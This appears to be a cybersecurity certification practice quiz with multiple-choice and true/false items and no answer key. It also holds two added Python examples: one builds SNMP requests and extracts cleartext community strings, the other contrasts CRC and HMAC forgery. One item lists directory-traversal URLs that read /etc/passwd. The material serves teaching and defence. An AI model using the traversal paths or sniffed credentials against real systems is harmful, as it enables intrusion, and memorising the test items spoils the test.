A fake website mimicking a legitimate online retailer, designed to steal user login credentials is an example
of:

• Malicious software

• Brand impersonation

• Identity fraud

• Watering hole attack

The term "Typosquatting" refers to a deceptive practice involving the deliberate registration of domain
names with misspellings or slight variations that closely resemble well-established and popular
domain names. The primary goal of this strategy is to exploit the common typographical errors made
by users while entering URLs into their web browser's address bar. Beyond capturing inadvertent
traffic, typosquatting may also be used for hosting phishing sites to trick users into divulging sensitive
information, distributing malware through deceptive websites, generating ad
revenue by redirecting mistyped traffic, or engaging in brand impersonation to harm the reputation of
authentic brands or deceive users.

• True

• False

In email communication, what signs can be of help in recognizing a phishing attempt?

• The message contains poor spelling and grammar

• The message asks for personal information

• The message includes a call to action with a sense of urgency

• The message includes suspicious links or attachments

• Any of the above

What would be an appropriate user response to an email phishing attempt? (Select all that apply)

• Not replying to the message or providing any personal information

• Reporting the message to the IT or security department, if applicable

• Deleting the message from the inbox

• Not clicking on any links or downloading any attachments in the message

• Forwarding the message to the sender to verify its legitimacy

• Opening the attachment in a sandbox environment to check its safety

What is the best countermeasure against social engineering attacks?

• Situational awareness

• Implicit deny policy

• User education

• Strong security controls

Malware that restricts access to a computer system by encrypting files or locking the entire system
down until the user performs a requested action is called:

• Grayware

• Adware

• Ransomware

• Spyware

A Trojan horse is a type of software that performs harmful actions under the guise of a legitimate and
useful program. The most characteristic feature of a Trojan horse is that while it may function
as a legitimate program and possess all the expected functionalities, it also contains a concealed portion of
malicious code that the user is unaware of.

• True

• False

Which type of Trojan enables unauthorized remote access to a compromised system?

• APT

• RAT

• MaaS

• PUP

A standalone malicious computer program that typically propagates itself over a computer network to
adversely affect system resources and network bandwidth is referred to as:

• Worm

• Fileless virus

• Bot

• Logic bomb

Malicious software collecting information about users without their knowledge/consent is known as:

• Cryptomalware

• Adware

• Ransomware

• Spyware

Which of the answers listed below refer to the characteristic features of bloatware? (Select 3 answers)

• Pre-installed on a device by the device manufacturer or retailer

• Generally considered undesirable due to negative impact on system performance

• Installed without user consent

• Can be pre-installed, downloaded, or bundled with other software

• Generally considered undesirable due to negative impact on system performance, privacy, and
security

Which of the following answers refer to the characteristics of a PUP? (Select 3 answers)

• Often installed without clear user consent

• Can be pre-installed, downloaded, or bundled with other software

• Generally considered undesirable due to negative impact on system performance, privacy, and
security

• Pre-installed on a device by the device manufacturer or retailer

• Generally considered undesirable due to negative impact on system performance


Which of the statements listed below apply to the definition of a computer virus? (Select 3 answers)

• A self-replicating computer program containing malicious segment

• Malware that typically requires its host application to be run to make the virus active

• A standalone malicious computer program that replicates itself over a computer network

• Malware that can run by itself without any interaction

• Malicious code that typically attaches itself to an application program or other executable
component

• A self-contained malicious program or code that does not need a host to propagate itself

Which of the following is an example of spyware?

• Keylogger

• Vulnerability scanner

• Computer worm

• Packet sniffer

Malicious code activated by a specific event is called:

• Cryptomalware

• Backdoor

• Rootkit

• Logic bomb

Which of the following answers refers to a collection of software tools used by a hacker to mask intrusion
and obtain administrator-level access to a computer or computer network?

• Rootkit

• Spyware

• Backdoor

• Trojan

What type of action allows an attacker to exploit the XSS vulnerability?

• Code injection

• Privilege escalation

• Session hijacking

• Packet sniffing

Which of the following exploits targets a protocol used for managing and accessing networked resources?

• CSRF/XSRF attack

• XML injection attack

• LDAP injection attack

• SQL injection attack

Which type of exploit targets web applications that generate content used to store and transport data?

• SQL injection attack

• CSRF/XSRF attack

• XML injection attack

• LDAP injection attack

A type of exploit that relies on overwriting contents of memory to cause unpredictable results in an
application is referred to as:

• IV attack

• Privilege escalation

• Buffer overflow

• DLL injection

A situation where an attacker intercepts and retransmits valid data exchange between an application
and a server, or another application is known as:

• Sideloading

• Replay attack

• Phishing attack

• Race condition

Which of the following facilitate(s) privilege escalation attacks? (Select all that apply)

• System/application vulnerabilities

• Password hashing

• System/application misconfigurations

• Network segmentation

• Social engineering techniques


Which of the statements listed below apply to the CSRF/XSRF attack? (Select 3 answers)

• Exploits the trust a website has in the user's web browser

• A user is tricked by an attacker into submitting unauthorized web requests

• Website executes attacker's requests

• Exploits the trust a user's web browser has in a website

• A malicious script is injected into a trusted website

• User's browser executes attacker's script

A dot-dot-slash attack is also referred to as:

• Disassociation attack

• On-path attack

• Directory traversal attack

• Downgrade attack

Which of the following URLs is a potential indicator of a directory traversal attack?

• http://www.example.com/var/../etc/passwd

• http://www.example.com/var/www/../../etc/passwd

• http://www.example.com/var/www/files/../../../etc/passwd

• http://www.example.com/var/www/files/images/../../../../etc/passwd

• Any of the above

Which of the following answers refers to a deprecated wireless authentication protocol developed by
Cisco?

• PEAP

• EAP-TTLS

• LEAP

• EAP-TLS

Which of the answers listed below refers to an open standard wireless network authentication protocol that enhances security by encapsulating the authentication process within an encrypted TLS tunnel?

• PEAP

• EAP

• LEAP

• RADIUS

Which of the programming aspects listed below are critical in the secure application development process?
(Select 2 answers)

• Patch management

• Input validation

• Password protection

• Error and exception handling

• Application whitelisting

A situation in which a web form field accepts data other than expected (e.g., server commands) is an
example of:

• Zero-day vulnerability

• Improper input validation

• Default configuration

• Improper error handling

Which of the following answers refers to a countermeasure against code injection?

• Fuzzing

• Input validation

• Code signing

• Normalization

The term "Secure cookie" refers to a type of HTTP cookie that is transmitted over an encrypted HTTPS
connection, which helps prevent the cookie from being intercepted or tampered with during transit.

• True

• False

Which of the terms listed below refers to an automated or manual code review process aimed at
discovering logic and syntax errors in the application's source code?

• Input validation

• Dynamic code analysis

• Fuzzing

• Static code analysis

A dynamic code analysis allows for detecting application flaws without the need for actual execution of
the application code.

• True

• False

The term "Static code analysis" refers to the process of discovering application runtime errors.

• True

• False

What is the purpose of code signing? (Select 2 answers)

• Disables code reuse

• Confirms the application's source of origin

• Enables application installation

• Validates the application's integrity

• Protects the application against unauthorized use

The practice of finding vulnerabilities in an application by feeding it incorrect input is called:

• Normalization

• Hardening

• Dynamic code analysis

• Fuzzing

In computer security, a mechanism for safe execution of untested code or untrusted applications is
referred to as:

• Sideloading

• Virtualization

• Sandboxing

• Stress testing

Which of the following answers refers to a Windows-specific feature for handling exceptions, errors,
and abnormal conditions in software?

• EPC

• SEH

• EH

• EXR

Address Space Layout Randomization (ASLR) is an OS security technique that randomizes the
location of key data areas in memory. The purpose of ASLR is to prevent attackers from predicting the
location of specific code or data in memory, which adds a layer of defense against memory-based attacks, such as buffer overflows.

• True

• False

A type of user identification mechanism used as a countermeasure against automated software (such
as network bots) is known as:

• MFA

• CAPTCHA

• SSO

• NIDS

Which of the answers listed below refers to a hardware monitoring and asset tracking method?

• Barcode labels

• QR codes

• RFID tags

• GPS tracking

• All of the above

Which of the following wireless technologies enables identification and tracking of tags attached to
objects?

• GPS

• IR

• RFID

• NFC

Which type of software enables monitoring and tracking of mobile devices?

• MDM

• GPS

• NFC

• GSM

One of the ways to prevent data recovery from a storage drive is to overwrite its contents. The data overwriting
technique is used by drive wipe utilities which might employ different methods
(including multiple overwriting rounds) to decrease the likelihood of data retrieval. As an example, a disk
sanitization utility might overwrite the data on the drive with the value of one in the first
pass, change that value to zero in the second pass, and finally perform a few more passes, overwriting
the contents with random characters.

• True

• False

Which of the destruction tools/methods listed below allow(s) for secure disposal of physical documents?
(Select all that apply)

• Shredding

• Overwriting

• Burning

• Formatting

• Degaussing

Which of the following methods provides the most effective way for permanent removal of data stored
on a magnetic drive?

• Cryptographic erasure

• Data overwriting

• Degaussing

• Low-level formatting

A certificate of destruction is a document issued by companies that conduct secure device/document disposal. The certificate verifies proper asset destruction and can be used for auditing purposes. In the case of device disposal, the document includes a list of all the items that have been destroyed along with their serial numbers. It may also describe the destruction method, specify location (on-site/off-site), or list the names of witnesses who oversaw the entire process.

• True

• False

Which policy typically specifies the period during which certain types of data must be stored prior to
disposal?

• Data protection policy

• Data classification policy

• Data backup policy

• Data retention policy

Vulnerability scanning: (Select all that apply)

• Identifies lack of security controls

• Actively tests security controls

• Identifies common misconfigurations

• Exploits vulnerabilities

• Passively tests security controls


Which of the answers listed below refer to the characteristic features of static code analysis? (Select 3
answers)

• Involves examining the code without executing it

• Often used early in the development process

• Examines code structure, syntax, and semantics to detect issues like syntax errors, coding
standards violations, security vulnerabilities, and bugs

• Typically used later in the software development lifecycle

• Involves executing the code and analyzing its behavior at runtime

• Analyzes runtime properties like memory usage, performance, and error handling to
identify issues such as memory leaks, performance bottlenecks, and runtime errors

Which of the answers listed below refers to a concept that provides insights into methods and tools
that cybercriminals use to carry out attacks?

• TTP

• CVE

• ATT&CK

• CVSS

A dedicated security solution that filters, monitors, and blocks HTTP/HTTPS traffic between a web application
and the Internet is referred to as:

• UTM

• NGFW

• UEM

• WAF

Which of the following solutions provides active network security breach response on an individual
computer system?

• NIDS

• HIDS

• NIPS

• HIPS

Which of the acronyms listed below refers to a risk assessment formula defining probable financial
loss due to a risk over a one-year period?

• ARO

• SLE

• ALE

• SLA

A software technology designed to provide confidentiality for an entire data storage device is known as:

• TPM

• FDE

• EFS

• HSM

High MTBF value indicates that a component or system provides low reliability and is more likely to fail.

• True

• False

Which part of the AAA security architecture deals with the verification of the identity of a person or
process?

• Accounting

• Authentication

• Auditing

• Authorization

Which of the following answers refers to a routing protocol used in computer networks to determine
the best path for routing data packets from one network node to another?

• BGP

• EIGRP

• RIP

• OSPF

Which of the answers listed below refers to an industry standard for assessing and scoring the
severity of computer system security vulnerabilities?

• SIEM

• CVSS

• OSINT

• SOAR

Which of the following answers refers to a hardware or software solution providing secure remote access to
networks and resources?

• NAC

• RDP

• SSH

• RAS

Which of the wireless technologies listed below are deprecated and should not be used due to
their known vulnerabilities? (Select 2 answers)

• WPS

• WAP

• WPA2

• WAF

• WEP

Which of the following answers refer(s) to SSDs? (Select all that apply)

• Low performance

• Relatively high device cost

• Lower capacity in comparison to magnetic drives

• High performance

• Relatively low device cost

• Higher capacity in comparison to magnetic drives

• Lack of moving parts (takes advantage of memory chips instead of magnetic platters)

An SWG is a software component or a hardware device designed to prevent unauthorized traffic from entering an organization's internal network. An SWG implementation may include various security services, such as packet filtering, URL/content filtering, malware inspection, application controls, AUP enforcement, or DLP.

• True

• False

A type of forensic evidence that can be used to detect unauthorized access attempts or other
malicious activities is called:

• CVE

• IoC

• AIS

• OSINT

Which of the answers listed below refers to a remote access authentication protocol that periodically re-authenticates the client at random intervals to prevent session hijacking?

• EAP

• CHAP

• PAP

• PEAP

A type of surveillance system comprising video cameras and monitors that enable continuous monitoring
and recording of specific areas is commonly referred to as CCTV.

• True

• False

Which of the following answers refers to an ECC-based method for creating and verifying digital signatures?

• DHE

• ECDSA

• HMAC

• ECDHE

Which of the actions listed below can be taken by an IDS? (Select 2 answers)

• Firewall reconfiguration

• Closing down connection

• Logging

• Terminating process

• Sending an alert

FTPS is an extension to the SSH protocol and runs by default on port number 22.

• True

• False

Which of the following terms refers to a dedicated transport mechanism for cyber threat information?

• STIX

• CVE

• TAXII

• CVSS

Which of the answers listed below refers to a legacy symmetric-key block cipher encryption algorithm?

• RC4

• DES

• RSA

• DSA

A Microsoft-proprietary protocol providing a user with graphical interface for connecting to another
networked host is known as:

• VDI

• RDP

• SSH

• VNC

Which of the following acronyms refers to a comprehensive strategy and set of procedures
designed to ensure that an organization can continue its critical operations and functions during and
after a disruptive event?

• DRP

• CP

• BCP

• COOP

The term "AI" refers to computer systems and algorithms that can perform tasks typically requiring
human intelligence, such as problem-solving, learning, and decision-making.

• True

• False

Which of the algorithms listed below does not fall into the category of asymmetric encryption?

• RSA

• GPG

• DSA

• AES

• DHE

• ECDHE

• PGP

A type of cyberattack focused on making a website, service, or network unavailable to users by overloading it
with traffic or malicious requests is called:

• SQLi

• XSS

• CSRF

• DoS

In quantitative risk assessment, this term is used for estimating the likelihood of occurrence of a future
threat.

• ALE

• SLA

• ARO

• SLE

Which of the following answers refers to a cryptographic file generated by an entity requesting a digital
certificate from a CA?

• OID

• CSR

• DN

• CRL

Which of the answers listed below refers to a broad term that encompasses various control and
automation systems used in industrial settings to control and monitor physical processes and
machinery?

• ICS

• PLC

• SCADA

• HMI

ACL, FACL, DAC, MAC, and RBAC are all access control mechanisms that can be used to manage
user permissions and protect the confidentiality, integrity, and availability of data.

• True

• False

A type of access control model that grants object owners the authority to determine access permissions is
referred to as:

• ACL

• RBAC

• DAC

• MAC

Which wireless technology enables identification and tracking of tags attached to objects?

• WTLS

• GPS

• RFID

• NFC

Which of the following answers refers to a tunneling protocol that is often used in combination with
IPsec to secure VPN connections?

• GRE

• L2TP

• BGP

• SSL

Which of the answers listed below refers to a cloud computing service model in which clients,
instead of buying all the hardware and software, purchase computing resources as an outsourced service
from suppliers who own and maintain all the necessary equipment and software?

• SaaS

• DaaS

• PaaS

• IaaS

An account lockout might indicate which type of malicious activity?

• Attempt to deliver malicious content

• DoS attack

• Account compromise

• Password brute-forcing attempt


Which of the terms listed below most accurately describes a situation wherein a single account is being
used from multiple locations/devices at the same time?

• Spraying attack

• Concurrent session usage

• Single Sign-On (SSO)

• Impossible travel

Which of the following terms refers to a malicious activity indicator in a situation where a firewall or other
security measure prevents an attempt to deliver malicious payload or perform an
unauthorized action?

• DoS attack

• Resource inaccessibility

• Blocked content

• Excessive system resource consumption

Which of the terms listed below most accurately describes a situation wherein an account is
accessed from a location that is physically impossible for the user to be in?

• Login time restrictions

• Impossible travel

• Concurrent session usage

• Out-of-cycle logging

The term "Out-of-cycle logging" refers to instances where systems or applications produce logs
outside their regular intervals or in abnormal volumes, potentially signaling malicious activity.

• True

• False

Which of the following would indicate an attempt to hide evidence of malicious activity?

• Account lockout

• Resource inaccessibility

• Missing logs

• Concurrent session usage

Which of the answers listed below refers to any type of information pertaining to an individual that can be
used to uniquely identify that person?

• PHI

• Biometrics

• ID

• PII

Which of the following regulates personal data privacy of the EU citizens?

• PHI

• HIPAA

• PCI DSS

• GDPR

The US Health Insurance Portability and Accountability Act (HIPAA) provides privacy protection for:

• PII

• PI

• PHI

• PIV

The purpose of PCI DSS is to provide protection for:

• Credit cardholder data

• Licensed software

• User passwords

• Personal health information

Which of the answers listed below refer(s) to encryption method(s) used to protect data at rest? (Select
all that apply)

• FDE

• SED

• IPsec

• TLS

• VPN

• EFS

Encryption methods used to protect data in transit include: (Select all that apply)

• NFS

• VPN

• SED

• IPsec

• FDE

• TLS

Which of the following data states typically requires data to be processed in an unencrypted form?

• Data in motion

• Data at rest

• Data in transit

• Data in use

Which of the answers listed below refer to examples of non-human readable data types? (Select 2 answers)

• Binary code

• XML files

• Machine language

• HTML code

• SQL queries

Which of the following answers refers to an individual or role responsible for overseeing and ensuring
compliance with data protection laws and policies within an organization?

• CTO

• DPO

• CIO

• CSO

A mobile device's built-in functionality enabling the usage of locator applications is known as:

• WPS

• GSM

• SIM

• GPS

Which of the answers listed below refers to a technology that provides control over the usage of a mobile
device within a designated area?

• Geofencing

• Captive portal

• Honeypot

• Geolocation

Which of the following converts plaintext data into ciphertext using an algorithm and a key?

• Encryption

• Masking

• Tokenization

• Obfuscation

Which of the answers listed below refers to a technique that enables converting input data into a fixed-
size string, making it difficult to reverse or retrieve the original data?

• Obfuscation

• Tokenization

• Hashing

• Encryption

Which of the following answers refer to data masking? (Select 2 answers)

• Replaces sensitive data with fictitious or modified data while retaining its original format

• Allows for data manipulation in environments where the actual values are not needed

• Transforms data into an unreadable format using an algorithm and an encryption key

• Creates a unique, fixed-length string from the original data

• Replaces sensitive data with a non-sensitive identifier that has no meaning or value
outside the specific system

Which of the answers listed below refers to a situation where sensitive data is stored in a separate
location and can be retrieved with a non-sensitive replacement that can also be processed just like
the original data without the risk of revealing the contents of original data?

• Masking

• Obfuscation

• Encryption

• Tokenization

Which of the following modifies data or code to make it difficult to understand or reverse-engineer, but without necessarily encrypting or hiding the data?

• Tokenization

• Encryption

• Obfuscation

• Hashing

Which of the answers listed below refer to the advantages of segmentation as a method for securing
data? (Select 3 answers)

• Enhances security by limiting the spread of cyberattacks

• Helps organizations comply with data regulatory requirements by isolating and protecting
specific data types

• Provides security for data in transit with the use of encryption

• Guarantees data recovery in case of accidental deletion or system failures

• Provides better control over user access to sensitive data

Penetration testing: (Select all that apply)

• Bypasses security controls

• Only identifies lack of security controls

• Actively tests security controls

• Exploits vulnerabilities

• Passively tests security controls

In cybersecurity exercises, red team takes on the role of:

• An attacker

• A defender

• Both an attacker and a defender

• An exercise overseer

In cybersecurity exercises, the defending team is known as:

• Red team

• Blue team

• White team

• Purple team

In cybersecurity exercises, the role of an event overseer (i.e., the referee) is delegated to:

• Red team

• Blue team

• White team

• Purple team

In cybersecurity exercises, a purple team assumes the integrated role of all other teams (i.e., red, blue,
and white).

• True

• False

A penetration test performed by an authorized professional with the full prior knowledge on how the
system that is to be tested works is called:

• Black-hat hacking

• White-box testing

• Black-box testing

• White-hat hacking

Which of the following terms is used to describe a penetration test in which the person
conducting the test has limited access to information on the internal workings of the targeted system?

• Black-box testing

• Fuzz testing

• Gray-box testing

• White-box testing

A penetration test of a computer system performed without prior knowledge of how the system that
is to be tested works is referred to as black-box testing.

• True

• False

In penetration testing, active reconnaissance involves gathering any type of publicly available
information that can be used later for exploiting vulnerabilities found in the targeted system.

• True

• False

In penetration testing, passive reconnaissance relies on gathering information on the targeted system with the use of various non-invasive software tools and techniques, such as pinging, port scanning, or OS fingerprinting.

• True

• False

Which of the following terms refers to an agreement that specifies performance requirements for a
vendor?

• MSA

• SLA

• MOU

• SOW

Which of the acronyms listed below refers to a formal and often legally binding document that outlines
specific responsibilities, roles, and terms agreed upon by two or more parties?

• SOW

• MOA

• MSA

• MOU

A type of nonbinding agreement outlining mutual goals and the general framework for cooperation between
two or more parties is referred to as:

• MOA

• SOW

• MOU

• MSA

A type of legally binding contract that establishes the foundational terms and conditions governing
future agreements between two parties is known as:

• MOU

• SLA

• MSA

• SOW

Which of the following acronyms refers to a document that authorizes, initiates, and tracks the progress
and completion of a particular job or task?

• SOW

• WO

• SLA

• MSA

A detailed agreement between a client and a vendor that describes the work to be performed on a project is
called:

• MSA

• SLA

• WO

• SOW

A legal contract between the holder of confidential information and another person to whom that
information is disclosed restricting that other person from disclosing the confidential information to any
other party is referred to as:

• ISA

• NDA

• BPA

• SLA

Which of the terms listed below refers to a formal contract between business partners outlining the
rights, responsibilities, and obligations of each partner regarding the management, operation, and
decision-making processes within the business?

• MSA

• SLA

• BPA

• MOA

Which of the following statements describe the features of dynamic code analysis? (Select 3 answers)

• Typically used later in the software development lifecycle

• Involves examining the code without executing it

• Analyzes runtime properties like memory usage, performance, and error handling to
identify issues such as memory leaks, performance bottlenecks, and runtime errors

• Often used early in the development process

• Examines code structure, syntax, and semantics to detect issues like syntax errors, coding
standards violations, security vulnerabilities, and bugs

• Involves executing the code and analyzing its behavior at runtime

Which of the terms listed below refers to tracking and managing software application components,
such as third-party libraries and other dependencies?

• Version control

• Package monitoring

• Configuration enforcement

• Application hardening

Which of the following terms refers to threat intelligence gathered from publicly available sources?

• IoC

• OSINT

• RFC

• CVE/NVD

Which of the terms listed below refers to a US government initiative for real-time sharing of cyber threat
indicators?

• AIS

• STIX

• TTP

• CVSS

What is STIX?

• A type of vulnerability database

• Common language for describing cyber threat information

• US government initiative for real-time sharing of cyber threat indicators

• Transport mechanism for cyber threat information

A dedicated transport mechanism for cyber threat information is called:

• TCP/IP

• TLS

• TAXII

• S/MIME

Which of the following provides insights into the methods and tools used by cybercriminals to carry
out attacks?

• CVE

• IoC

• AIS

• TTP

Which of the following statements does not apply to the dark web?

• Typically requires specialized software to access its contents

• Forms a large part of the deep web

• Not indexed by traditional search engines

• Often associated with trading stolen data, malware, and cyber threats

A responsible disclosure program is a formal process established by an organization to encourage security researchers and ethical hackers to report vulnerabilities they discover in the organization's systems or software. A bug bounty program is a specific type of responsible disclosure program that offers financial rewards to security researchers for reporting valid vulnerabilities.

• True

• False

Antivirus software identifying a non-malicious file as a virus due to a faulty virus signature file is an example of:

• Fault tolerance

• False positive error

• Quarantine feature

• False negative error

Which of the answers listed below refers to a situation where no alarm is raised when an attack has
taken place?

• False negative

• True positive

• False positive

• True negative

A measure of the likelihood that a security system will incorrectly reject an access attempt by an authorized
user is referred to as:

• FAR

• CER

• CRC

• FRR

Which of the following terms refers to a framework and knowledge base that provides understanding of
TTPs used during cyberattacks?

• CVSS

• ATT&CK

• STIX

• TAXII

Which of the following refers to a system that identifies, defines, and catalogs publicly known
cybersecurity vulnerabilities?

• TAXII

• CVE

• STIX

• CVSS

What is Exposure Factor (EF) in vulnerability analysis?

• The likelihood that a vulnerability will be exploited in a real-world scenario

• The rate at which vulnerabilities are discovered and reported

• The degree of loss that a realized threat would have on a specific asset

• The measure of the potential impact of a vulnerability on an organization's assets

Which of the statements listed below does not refer to a vulnerability response and remediation technique?

• Applying updates or fixes provided by software vendors to address the vulnerability (patching)

• Ensuring financial recovery from the costs associated with a successful cyberattack
(insurance)

• Dividing a network into smaller, isolated zones to limit the potential impact of a
vulnerability (segmentation)

• Mitigating the risk associated with a vulnerability that cannot be immediately patched by
implementing alternative security measures (compensating controls)

• Delaying or forgoing a patch for a specific system, e.g., when applying a patch may not be
feasible due to compatibility issues or potential disruptions to critical systems (exceptions and
exemptions)

• All of the above answers are examples of vulnerability response and remediation
techniques

The practice of isolating potentially malicious or suspicious entities to prevent them from causing harm
to the rest of the network or system is known as:

• Sandboxing

• Containerization

• Quarantine

• Segmentation

Which of the following answers refer to SCAP? (Select 3 answers)

• A type of security system designed to collect logs and events from various sources

• Designed to provide a centralized user interface for accessing collected data

• A collection of standards developed by NIST

• Provides a common language for communicating security information

• Allows different security tools to share data and work together more effectively

• Enables real-time threat detection, incident response, and compliance monitoring

Which of the answers listed below refer to SIEM? (Select 3 answers)

• Allows different security tools to share data and work together more effectively

• Designed to provide a centralized user interface for accessing collected data

• A collection of standards developed by NIST

• Enables real-time threat detection, incident response, and compliance monitoring

• A type of security system designed to collect logs and events from various sources

• Provides a common language for communicating security information

Which of the following acronyms refers to software or hardware-based security solutions designed to detect and prevent unauthorized use and transmission of confidential information?

• IPS

• DLP

• IDS

• DEP

Simple Network Management Protocol (SNMP) is a UDP-based, application layer protocol used in
network management systems to monitor network-attached devices. SNMP is typically integrated into
most modern network infrastructure devices such as routers, bridges, switches, servers,
printers, copiers, fax machines, and other network-attached devices. An SNMP-managed network
comprises three essential components: a managed device, a network-management software
module that resides on a managed device (Agent), and a Network Management Station (NMS),
which runs applications responsible for monitoring and controlling managed devices, as well as
collecting SNMP information from Agents. The manager receives notifications (Traps and InformRequests)
on UDP port 162, while the SNMP Agent receives requests on UDP port 161.

• True

• False

An SNMP-compliant device includes a virtual database containing information about configuration and state of the device that can be queried by an SNMP management station. This type of data repository is referred to as:

• MIB

• DCS

• NMS

• SIEM

Of the three existing versions of the Simple Network Management Protocol (SNMP), versions 1 and 2c
(SNMPv1 and SNMPv2c) offer only authentication based on community strings sent in an
unencrypted form (a.k.a. cleartext), so anyone able to sniff the traffic can read and reuse them. SNMPv3
adds packet encryption (privacy), user-based authentication, and integrity mechanisms (HMAC) that allow
checking whether data has changed in transit.

• True

• False
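
As an added example (not part of the original question set), the following Python builds an SNMPv1/v2c GetRequest for sysDescr.0 by hand, using the BER encoding that SNMP messages actually use, and then parses the version and community string back out of the raw bytes the way a passive sniffer would. It uses only the standard library; the community string and OID are constructed sample values, and nothing is sent on the network.

```python
def ber_length(n: int) -> bytes:
    """BER length: short form below 128, long form (0x80 | byte count, then the bytes) otherwise."""
    if n < 0x80:
        return bytes([n])
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(body)]) + body

def tlv(tag: int, value: bytes) -> bytes:
    return bytes([tag]) + ber_length(len(value)) + value

def encode_int(n: int) -> bytes:
    # minimal two's-complement encoding (a leading 0x00 is added when the top bit is set)
    length = n.bit_length() // 8 + 1
    return tlv(0x02, n.to_bytes(length, "big", signed=True))

def encode_octets(s: bytes) -> bytes:
    return tlv(0x04, s)

def encode_oid(dotted: str) -> bytes:
    arcs = [int(a) for a in dotted.split(".")]
    out = bytearray([40 * arcs[0] + arcs[1]])        # first two arcs share one byte (1.3 -> 0x2B)
    for arc in arcs[2:]:                              # remaining arcs in base-128, high bit = "more"
        chunk = [arc & 0x7F]
        arc >>= 7
        while arc:
            chunk.append(0x80 | (arc & 0x7F))
            arc >>= 7
        out += bytes(reversed(chunk))
    return tlv(0x06, bytes(out))

def build_get_request(community: str, oid: str, request_id: int = 1, version: int = 0) -> bytes:
    """SNMP message = SEQUENCE { version, community, GetRequest-PDU }. version 0 = v1, 1 = v2c."""
    varbind = tlv(0x30, encode_oid(oid) + b"\x05\x00")            # OID + NULL placeholder value
    pdu = tlv(0xA0, encode_int(request_id) + encode_int(0) + encode_int(0)   # id, error-status, error-index
              + tlv(0x30, varbind))
    return tlv(0x30, encode_int(version) + encode_octets(community.encode()) + pdu)

def _read_tlv(buf: bytes, pos: int):
    tag, length = buf[pos], buf[pos + 1]
    pos += 2
    if length & 0x80:                                  # long-form length
        nbytes = length & 0x7F
        length = int.from_bytes(buf[pos:pos + nbytes], "big")
        pos += nbytes
    return tag, buf[pos:pos + length], pos + length

def extract_community(packet: bytes):
    """What a passive sniffer sees in SNMPv1/v2c: version and community string sit in cleartext."""
    tag, body, _ = _read_tlv(packet, 0)
    assert tag == 0x30, "not an SNMP message"
    vtag, vbytes, pos = _read_tlv(body, 0)
    ctag, cbytes, _ = _read_tlv(body, pos)
    assert vtag == 0x02 and ctag == 0x04
    return int.from_bytes(vbytes, "big", signed=True), cbytes.decode()

if __name__ == "__main__":
    pkt = build_get_request("public", "1.3.6.1.2.1.1.1.0")       # constructed sample request
    print(pkt.hex())
    print(extract_community(pkt))                                  # (0, 'public')
```

Feed build_get_request() to a UDP socket aimed at port 161 and the agent replies to the sender's port. The point of extract_community() is that it needs no key at all; that is exactly why SNMPv3 with authPriv is the only acceptable configuration on networks where traffic can be observed.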

Which of the following answers refers to a family of cryptographic hash functions designed for various
security-related applications, including digital signatures, password storage, secure
communications, and data integrity verification?

• RSA

• AES

• PKCS

• SHA

Which of the hash functions listed below offers the highest level of security?

• MD5

• SHA-3

• RIPEMD-160

• HMAC

Which of the following combines a cryptographic hash function with a secret key to provide a means of
verifying both the authenticity and integrity of a message or data?

• MD5

• DSA

• HMAC

• DES

Which of the answers listed below refers to a non-cryptographic hash function often used for
error-checking purposes?

• MD5

• CRC

• SHA

• RIPEMD
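
The three items above (cryptographic hash, HMAC, CRC) differ in what they protect against. As an added example, not from the original document, this Python compares them on a constructed sample message and shows why a CRC or a plain hash cannot stop a deliberate change while an HMAC can. The message and key are made-up demo values.

```python
import hashlib
import hmac
import zlib

MESSAGE = b"transfer 100 EUR to account 42"   # constructed sample message
KEY = b"shared-secret-demo-key"                # constructed demo key (normally from a KMS or config)

def sha256_hex(data: bytes) -> str:
    """Plain cryptographic hash: fixed-size digest, one-way, collision-resistant."""
    return hashlib.sha256(data).hexdigest()

def differing_bits(a: bytes, b: bytes) -> int:
    """Hamming distance between two equal-length digests (shows the avalanche effect)."""
    return sum(bin(x ^ y).count("1") for x, y in zip(a, b))

def avalanche(msg: bytes = MESSAGE) -> int:
    """Flipping one bit of the input changes roughly half of the 256 digest bits."""
    altered = msg[:-1] + bytes([msg[-1] ^ 0x01])
    return differing_bits(hashlib.sha256(msg).digest(), hashlib.sha256(altered).digest())

# --- CRC: detects accidental corruption, not deliberate modification ---------
def crc_tag(msg: bytes) -> bytes:
    return zlib.crc32(msg).to_bytes(4, "big")

def crc_verify(msg: bytes, tag: bytes) -> bool:
    return crc_tag(msg) == tag

# --- HMAC: hash + secret key = integrity AND authenticity --------------------
def hmac_tag(key: bytes, msg: bytes) -> bytes:
    return hmac.new(key, msg, hashlib.sha256).digest()

def hmac_verify(key: bytes, msg: bytes, tag: bytes) -> bool:
    return hmac.compare_digest(hmac_tag(key, msg), tag)   # constant-time comparison

def attacker_forges_crc() -> bool:
    """No key is involved, so the attacker simply recomputes the CRC over the altered message."""
    forged = MESSAGE.replace(b"100", b"900")
    return crc_verify(forged, crc_tag(forged))

def attacker_forges_hmac() -> bool:
    """Without KEY the attacker cannot produce a tag that the verifier accepts."""
    forged = MESSAGE.replace(b"100", b"900")
    return hmac_verify(KEY, forged, hmac_tag(b"attacker-guess", forged))

if __name__ == "__main__":
    print("SHA-256:", sha256_hex(MESSAGE))
    print("bits changed by a 1-bit edit:", avalanche())
    print("CRC forgery accepted:", attacker_forges_crc())     # True
    print("HMAC forgery accepted:", attacker_forges_hmac())   # False
```

The same reasoning applies to an unkeyed SHA-256 used as a "checksum": an attacker who can change the data can recompute the digest, so plain hashes only prove integrity when the digest itself is delivered over a trusted channel (or signed).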

Which of the following answers refers to a type of additional input that increases password
complexity and provides better protection against brute-force, dictionary, and rainbow table attacks?

• Seed

• IV

• Salt

• Shim

A pseudo-random data added to a password before hashing is referred to as:

• Shim

• Salt

• IV

• Seed

Which cryptographic technique is used to prevent the effectiveness of rainbow tables in cracking hashed
passwords?

• Data masking

• Two-Factor Authentication (2FA)

• Key stretching

• Salting

Which of the answers listed below refers to a cryptographic technique that verifies the
authenticity and integrity of digital documents or messages by using a value computed from the
message's hash and the sender's private key?

• Digital signature

• Cryptographic hash function

• Digital certificate

• Asymmetric encryption

Which of the following answers refer to algorithms used for generating and verifying digital signatures?
(Select 3 answers)

• ECDSA

• RSA

• ECDHE

• DSA

• GPG/PGP

Which of the answers listed below refer to DSA? (Select 3 answers)

• Asymmetric algorithm

• Used for the key exchange process

• Symmetric algorithm

• Provides authentication, integrity, and non-repudiation

• Specifically designed for creating and verifying digital signatures

• Used for encryption

Which of the following answers refer to the characteristic features of RSA? (Select 3 answers)

• Asymmetric encryption algorithm

• A public key used for encryption and a private key used for decryption

• Suitable for bulk data encryption

• Used for secure communications, digital signatures, and key exchange

• Symmetric encryption algorithm

